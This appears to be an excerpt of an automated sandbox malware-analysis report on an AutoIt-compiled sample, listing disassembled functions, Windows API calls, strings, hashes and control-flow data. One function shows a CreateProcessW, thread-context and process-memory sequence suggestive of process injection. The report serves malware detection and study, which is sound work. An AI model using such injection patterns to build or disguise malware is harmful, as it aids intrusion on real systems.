                                                                  • Opcode ID: 42afd21685fb0b3a0ed8e2d3bbb5a697352c3c207b23c5ee75ed8cfc1d191350
                                                                  • Instruction ID: 8aa924665fe18c6b6aab35a6e239f4ee0e9245b668c68de3bc4ba8c05f09da73
                                                                  • Opcode Fuzzy Hash: 42afd21685fb0b3a0ed8e2d3bbb5a697352c3c207b23c5ee75ed8cfc1d191350
                                                                  • Instruction Fuzzy Hash: 23518170D0428CDAEF12DBA4C858BDFBB78AF55304F044199E6497B2C1C7B90B49CBA6
                                                                  Function 008F407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1098 8f407c-8f4092 1099 8f416f-8f4173 1098->1099 1100 8f4098-8f40ad call 8f7a16 1098->1100 1103 92d3c8-92d3d7 LoadStringW 1100->1103 1104 8f40b3-8f40d3 call 8f7bcc 1100->1104 1107 92d3e2-92d3fa call 8f7b2e call 8f6fe3 1103->1107 1104->1107 1108 8f40d9-8f40dd 1104->1108 1116 8f40ed-8f416a call 912de0 call 8f454e call 912dbc Shell_NotifyIconW call 8f5904 1107->1116 1120 92d400-92d41e call 8f7cab call 8f6fe3 call 8f7cab 1107->1120 1110 8f4174-8f417d call 8f8047 1108->1110 1111 8f40e3-8f40e8 call 8f7b2e 1108->1111 1110->1116 1111->1116 1116->1099 1120->1116
                                                                  APIs
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0092D3D7
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  • _memset.LIBCMT ref: 008F40FC
                                                                  • _wcscpy.LIBCMT ref: 008F4150
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008F4160
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                  • String ID: Line:
                                                                  • API String ID: 3942752672-1585850449
                                                                  • Opcode ID: 0ca42af29789b205aa293ae5aee1d220413e66b8cb3311079fb8afab63a46d34
                                                                  • Instruction ID: 84af585614ea8514dbe1f568812ff2fd6b6daf7abfa67109087e0cab3bca12e1
                                                                  • Opcode Fuzzy Hash: 0ca42af29789b205aa293ae5aee1d220413e66b8cb3311079fb8afab63a46d34
                                                                  • Instruction Fuzzy Hash: 3C31AE71009708ABE361EB74E845BEB77D8FF84314F10461AF695D20A1EB709658CB93
                                                                  Function 008F686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1133 8f686a-8f6891 call 8f4ddd 1136 92e031-92e041 call 95955b 1133->1136 1137 8f6897-8f68a5 call 8f4ddd 1133->1137 1141 92e046-92e048 1136->1141 1137->1136 1142 8f68ab-8f68b1 1137->1142 1143 92e067-92e0af call 910db6 1141->1143 1144 92e04a-92e04d call 8f4e4a 1141->1144 1146 92e052-92e061 call 9542f8 1142->1146 1147 8f68b7-8f68d9 call 8f6a8c 1142->1147 1153 92e0b1-92e0bb 1143->1153 1154 92e0d4 1143->1154 1144->1146 1146->1143 1156 92e0cf-92e0d0 1153->1156 1157 92e0d6-92e0e9 1154->1157 1158 92e0d2 1156->1158 1159 92e0bd-92e0cc 1156->1159 1160 92e260-92e263 call 912d55 1157->1160 1161 92e0ef 1157->1161 1158->1157 1159->1156 1164 92e268-92e271 call 8f4e4a 1160->1164 1163 92e0f6-92e0f9 call 8f7480 1161->1163 1167 92e0fe-92e120 call 8f5db2 call 9573e9 1163->1167 1171 92e273-92e283 call 8f7616 call 8f5d9b 1164->1171 1176 92e122-92e12f 1167->1176 1177 92e134-92e13e call 9573d3 1167->1177 1184 92e288-92e2b8 call 94f7a1 call 910e2c call 912d55 call 8f4e4a 1171->1184 1179 92e227-92e237 call 8f750f 1176->1179 1186 92e140-92e153 1177->1186 1187 92e158-92e162 call 9573bd 1177->1187 1179->1167 1189 92e23d-92e247 call 8f735d 1179->1189 1184->1171 1186->1179 1196 92e176-92e180 call 8f5e2a 1187->1196 1197 92e164-92e171 1187->1197 1195 92e24c-92e25a 1189->1195 1195->1160 1195->1163 1196->1179 1203 92e186-92e19e call 94f73d 1196->1203 1197->1179 1208 92e1a0-92e1bf call 8f7de1 call 8f5904 1203->1208 1209 92e1c1-92e1c4 1203->1209 1233 92e1e2-92e1f0 call 8f5db2 1208->1233 1211 92e1f2-92e1f5 1209->1211 1212 92e1c6-92e1e1 call 8f7de1 call 8f6839 call 8f5904 1209->1212 1214 92e1f7-92e200 call 94f65e 1211->1214 1215 92e215-92e218 call 95737f 1211->1215 1212->1233 1214->1184 1225 92e206-92e210 call 910e2c 1214->1225 1222 92e21d-92e226 call 910e2c 1215->1222 1222->1179 1225->1167 1233->1222
                                                                  APIs
                                                                    • Part of subcall function 008F4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009B52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008F4E0F
                                                                  • _free.LIBCMT ref: 0092E263
                                                                  • _free.LIBCMT ref: 0092E2AA
                                                                    • Part of subcall function 008F6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008F6BAD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                  • API String ID: 2861923089-1757145024
                                                                  • Opcode ID: 3c72fc30779521b288846e31eb548a4fc8c50255efe2dba5d820ab4246bfd546
                                                                  • Instruction ID: b51d5a8e8a6ebce3110894a977fef2ade8ecbed23b5f01b88e7e06aaea3486b1
                                                                  • Opcode Fuzzy Hash: 3c72fc30779521b288846e31eb548a4fc8c50255efe2dba5d820ab4246bfd546
                                                                  • Instruction Fuzzy Hash: 94918F7190422DEFCF04EFA4E8919EDB7B8FF05310B10442AF916EB2A1DB749955CB51
                                                                  Function 008F35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008F35A1,SwapMouseButtons,00000004,?), ref: 008F35D4
                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008F35A1,SwapMouseButtons,00000004,?,?,?,?,008F2754), ref: 008F35F5
                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,008F35A1,SwapMouseButtons,00000004,?,?,?,?,008F2754), ref: 008F3617
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 3677997916-824357125
                                                                  • Opcode ID: 923d407931d134faf1051d8be6293dff1a1b89b4fc50f359aa176e2779fa225c
                                                                  • Instruction ID: 4d07596c27334d282be53e633a17361c00ae312d80550635a907e3cc1aefc7bc
                                                                  • Opcode Fuzzy Hash: 923d407931d134faf1051d8be6293dff1a1b89b4fc50f359aa176e2779fa225c
                                                                  • Instruction Fuzzy Hash: 3511457161420CBFDF218FA4DC80ABEBBB8FF15744F008469E909E7210E2719E40ABA0
                                                                  Function 01414100 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 014148BB
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01414951
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01414973
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                  • Instruction ID: 5530a69e29ed8e60161b461c8bf78bc3cfa86a67ba90cf7fafd16f0ecb4c13d9
                                                                  • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                  • Instruction Fuzzy Hash: 3662FC30A14258DBEB24CFA4C850BDEB776EF58300F1491A9D10DEB3A4E7769E81CB59
                                                                  Function 0095955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F4EE5: _fseek.LIBCMT ref: 008F4EFD
                                                                    • Part of subcall function 00959734: _wcscmp.LIBCMT ref: 00959824
                                                                    • Part of subcall function 00959734: _wcscmp.LIBCMT ref: 00959837
                                                                  • _free.LIBCMT ref: 009596A2
                                                                  • _free.LIBCMT ref: 009596A9
                                                                  • _free.LIBCMT ref: 00959714
                                                                    • Part of subcall function 00912D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00919A24), ref: 00912D69
                                                                    • Part of subcall function 00912D55: GetLastError.KERNEL32(00000000,?,00919A24), ref: 00912D7B
                                                                  • _free.LIBCMT ref: 0095971C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                  • String ID:
                                                                  • API String ID: 1552873950-0
                                                                  • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                  • Instruction ID: f119e3f24f01ca0b2d8ffd1ab7199e3bc45b1e496a5e2768e692b962ac1a7715
                                                                  • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                  • Instruction Fuzzy Hash: 75513EB1904258ABDF24DF65DC81AAEBBB9FF88300F10449EF609A3241DB715A94CF59
                                                                  Function 0091470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                  • String ID:
                                                                  • API String ID: 2782032738-0
                                                                  • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                  • Instruction ID: 0f3370a3a81bcfad9f5392104776f8a7e782e03f3d645ca2ac60e8448889106d
                                                                  • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                  • Instruction Fuzzy Hash: 4E41B675B0074E9BDB18CE69D8809EE77A9EF8A360B24857DE819CB680D770DDC18B50
                                                                  Function 008F44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 008F44CF
                                                                    • Part of subcall function 008F407C: _memset.LIBCMT ref: 008F40FC
                                                                    • Part of subcall function 008F407C: _wcscpy.LIBCMT ref: 008F4150
                                                                    • Part of subcall function 008F407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008F4160
                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 008F4524
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008F4533
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0092D4B9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1378193009-0
                                                                  • Opcode ID: 934fae22622c98b09ddc1f9bf911c6c844af8812bbd7c8ca3e80ec205acad91b
                                                                  • Instruction ID: 47e53414b7f9b7f8883b29e5dfda26b9216daa1fd23e9cdcb4c1fc6dc649896e
                                                                  • Opcode Fuzzy Hash: 934fae22622c98b09ddc1f9bf911c6c844af8812bbd7c8ca3e80ec205acad91b
                                                                  • Instruction Fuzzy Hash: 79212570909798AFE732AB349855BF7BBECEF05314F04008EE39E96191C3742A84DB51
                                                                  Function 008F7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0092EA39
                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0092EA83
                                                                    • Part of subcall function 008F4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F4743,?,?,008F37AE,?), ref: 008F4770
                                                                    • Part of subcall function 00910791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009107B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                  • String ID: X
                                                                  • API String ID: 3777226403-3081909835
                                                                  • Opcode ID: 276af76f0da2b8071ea9555c3d3d54875edc9519a3d384bf58d5eb6d5fafb4cd
                                                                  • Instruction ID: 2e880480b1873e9fcaa301550ecf13ffe4e3332cf8f0eb8d7db096f3743a41ae
                                                                  • Opcode Fuzzy Hash: 276af76f0da2b8071ea9555c3d3d54875edc9519a3d384bf58d5eb6d5fafb4cd
                                                                  • Instruction Fuzzy Hash: 6C21C331A1425C9BDF119FA8DC45BEE7BFCAF49314F00401AE508EB241DFB459898FA2
                                                                  Function 009598E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 009598F8
                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0095990F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Temp$FileNamePath
                                                                  • String ID: aut
                                                                  • API String ID: 3285503233-3010740371
                                                                  • Opcode ID: 88f13241d0e4b55917c9415851a6e73efbe58a0da9777b8efedd9742eebc3d1b
                                                                  • Instruction ID: 1140b90e7795457f4ad37092015294fb0c57a60c82ccf7c3f4114b8197ac4c94
                                                                  • Opcode Fuzzy Hash: 88f13241d0e4b55917c9415851a6e73efbe58a0da9777b8efedd9742eebc3d1b
                                                                  • Instruction Fuzzy Hash: 73D05B7654430D6BDB50DB94DC0DF96773CE704704F0002B1BA64910A1ED7055949B91
                                                                  Function 0096CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14d2c07337deecc009e24e38d5919722fb9eeb58ad49fed32f5df66594d678b1
                                                                  • Instruction ID: 5617a55641e4d5e739a21f2dc273a6d36c7a0aadc8f5d5b5d023f4e14aae72ea
                                                                  • Opcode Fuzzy Hash: 14d2c07337deecc009e24e38d5919722fb9eeb58ad49fed32f5df66594d678b1
                                                                  • Instruction Fuzzy Hash: 16F159B1A083059FCB14DF28C484A6ABBE5FF88314F14892EF9999B351D731E945CF82
                                                                  Function 008FF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00910193
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0091019B
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009101A6
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009101B1
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009101B9
                                                                    • Part of subcall function 00910162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009101C1
                                                                    • Part of subcall function 009060F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008FF930), ref: 00906154
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008FF9CD
                                                                  • OleInitialize.OLE32(00000000), ref: 008FFA4A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 009345C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                  • String ID:
                                                                  • API String ID: 1986988660-0
                                                                  • Opcode ID: cf67b8d8d0025490ad15886254cefb0856704743bd82ff1c90297784d1689544
                                                                  • Instruction ID: 3e79d4be74bdef4ced54ea4978f8f30970183f69687e95b23a2610604dd3785f
                                                                  • Opcode Fuzzy Hash: cf67b8d8d0025490ad15886254cefb0856704743bd82ff1c90297784d1689544
                                                                  • Instruction Fuzzy Hash: 7681E4B0929B40CFC395EF39AB957597BE6FB48326752822AD009C7371EB704485EF11
                                                                  Function 008F434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 008F4370
                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F4415
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008F4432
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_$_memset
                                                                  • String ID:
                                                                  • API String ID: 1505330794-0
                                                                  • Opcode ID: f68e9c56e6cd2d8fd87890997d7903cd553f6b29a5599bd79e28db64e50e3f45
                                                                  • Instruction ID: 1c73fa40d48071f4ce138ffc07739feebded53e666d4ec74785aa13105a57a82
                                                                  • Opcode Fuzzy Hash: f68e9c56e6cd2d8fd87890997d7903cd553f6b29a5599bd79e28db64e50e3f45
                                                                  • Instruction Fuzzy Hash: 4D3193715197059FC720DF34D884BABBBF8FB58318F000A2EE69AD2351E771A944CB52
                                                                  Function 0091571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __FF_MSGBANNER.LIBCMT ref: 00915733
                                                                    • Part of subcall function 0091A16B: __NMSG_WRITE.LIBCMT ref: 0091A192
                                                                    • Part of subcall function 0091A16B: __NMSG_WRITE.LIBCMT ref: 0091A19C
                                                                  • __NMSG_WRITE.LIBCMT ref: 0091573A
                                                                    • Part of subcall function 0091A1C8: GetModuleFileNameW.KERNEL32(00000000,009B33BA,00000104,?,00000001,00000000), ref: 0091A25A
                                                                    • Part of subcall function 0091A1C8: ___crtMessageBoxW.LIBCMT ref: 0091A308
                                                                    • Part of subcall function 0091309F: ___crtCorExitProcess.LIBCMT ref: 009130A5
                                                                    • Part of subcall function 0091309F: ExitProcess.KERNEL32 ref: 009130AE
                                                                    • Part of subcall function 00918B28: __getptd_noexit.LIBCMT ref: 00918B28
                                                                  • RtlAllocateHeap.NTDLL(01380000,00000000,00000001,00000000,?,?,?,00910DD3,?), ref: 0091575F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 1372826849-0
                                                                  • Opcode ID: 1faefc4bfabe810432efab7be70a3ce673323e37292d7c7acba79a679279bca3
                                                                  • Instruction ID: b3ce1b6b553350a24b1d630fae7f4c05d8e8fab2321ad2d06ee57bd39d47d792
                                                                  • Opcode Fuzzy Hash: 1faefc4bfabe810432efab7be70a3ce673323e37292d7c7acba79a679279bca3
                                                                  • Instruction Fuzzy Hash: 6D01DE71398A09EAD6117738AC83BEA739C9BC2771F530529F419AA1C1DEB49CC05660
                                                                  Function 009598A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
